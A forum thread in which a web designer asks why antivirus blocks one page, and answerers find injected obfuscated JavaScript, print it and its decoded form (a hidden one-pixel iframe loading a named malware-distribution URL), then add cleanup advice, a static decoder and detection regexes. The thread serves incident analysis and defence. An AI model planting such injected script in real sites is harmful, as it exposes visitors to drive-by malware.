Page blocked by antivirus
My client reports that [this page][1] I designed is blocked by his antivirus (Norton). The rest of the website is not blocked. Do you have any idea why Norton would block this page? The report says "web attack: mass injection website 5".
3 Comments
I have just experienced the same. Someone actually managed to put a bizarre action in my htaccess and at the same time inserted very similar code into my header.php (this was on a WordPress installation). I stripped the htaccess and removed the numbered array from the header.
Then, the next day, the code was back in the header, but not in my htaccess. So I removed it from the header again, and now it seems to be gone.
At least I am not blacklisted any more. For the time.
(I upgraded my WordPress and installed a plugin called bulletproof security).
The date on my altered header.php was not changed.
PS: Have a look at this link, and go ahead and edit your htaccess. perishablepress.com/5g-blacklist-2012/
There is definitely some JavaScript embedded in that page that looks fishy. It is a JS that is obfuscated by being put as numbers in an array.
Excerpt reproduced below:
<script type="text/javascript" language="javascript"
>
try{window.document.body++}catch(gdsgsdg){dbshre=242;}if(dbshre){asd=0;
try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd)
{e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,101,109,107,100, [....] 23,117,6,4,120,32,32,34,53);s="";for(i=0;i-494!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}</script> <script type="text/javascript" src="http://intlwellness.com/wp-content/themes/intlwellness/jquery.validate.min.js"></script>
So if you haven't put it there, the site is somehow compromised.
EDIT: If you were to execute the above code in its entirety then it would generate and execute the following JavaScript:
(function () {
    var jvskl = document.createElement('iframe');
    jvskl.src = 'http://archiwumprasy.com/clk.php';
    jvskl.style.position = 'absolute';
    jvskl.style.border = '0';
    jvskl.style.height = '1px';
    jvskl.style.width = '1px';
    jvskl.style.left = '1px';
    jvskl.style.top = '1px';
    if (!document.getElementById('jvskl')) {
        document.write('<div id=\'jvskl\'></div>');
        document.getElementById('jvskl').appendChild(jvskl);
    }
})();
Which, as you can see, creates a hidden iframe that loads a malicious URL. That particular URL is known for distributing malware; however, it does appear to be benign currently.
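A static decoder for the obfuscation described in the answer above, as an added example that is not part of the original thread: it recovers the start and end of the payload from the quoted excerpt as plain text, without calling eval. The function names and the indicator patterns are assumptions chosen for illustration; the excerpt string is abridged from the post and keeps its "[....]" elision.

```javascript
// Added example: decode the numeric-array obfuscation statically (no eval).
// EXCERPT is abridged from the post above, including its "[....]" elision.
const EXCERPT =
  'asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,' +
  '26,27,109,89,107,26,101,109,107,100, [....] 23,117,6,4,120,32,32,34,53);' +
  's="";for(i=0;i-494!=0;i++){s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}';

const toInts = (s) => s.split(',').map((x) => x.trim()).filter(Boolean).map(Number);

// Split the array literal into the parts before and after the elision, and
// read the total length from the loop bound (i-494!=0), all as plain text.
function parseExcerpt(text) {
  const arr = /new Array\(([^)]*)\)/.exec(text);
  const bound = /i-(\d+)!=0/.exec(text);
  if (!arr || !bound) throw new Error('pattern not found');
  const [head, tail = ''] = arr[1].split(/\[\.+\]/);
  return { head: toInts(head), tail: toInts(tail), total: Number(bound[1]) };
}

// Undo the sample's transform: char = value - (i % 5 - 5 - 4), where i is the
// element's index in the full array, so the tail needs its real offset.
function decodeSlice(values, offset) {
  return values
    .map((v, k) => String.fromCharCode(v - ((offset + k) % 5 - 5 - 4)))
    .join('');
}

// Decode what the excerpt exposes: the first and last characters of the payload.
function analyze(text) {
  const { head, tail, total } = parseExcerpt(text);
  return { start: decodeSlice(head, 0), end: decodeSlice(tail, total - tail.length) };
}

// Indicators of the hidden-iframe pattern seen in the decoded payload
// (hypothetical rule names, for triaging decoded script text).
const INDICATORS = {
  createsIframe: /createElement\(\s*['"]iframe['"]\s*\)/i,
  onePixel: /style\.(height|width)\s*=\s*['"][01]px['"]/i,
  documentWrite: /document\.write\s*\(/i,
};
function triage(js) {
  return Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(js));
}

console.log(analyze(EXCERPT));
```

The decoded start and end match the first and last lines of the JavaScript shown in the answer, which confirms the transform without running the sample.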
Probably someone injected malicious JS code in the page.
But checking with Google, it doesn't seem that there is anything: www.google.com/safebrowsing/diagnostic?site=http://intlwellness.com/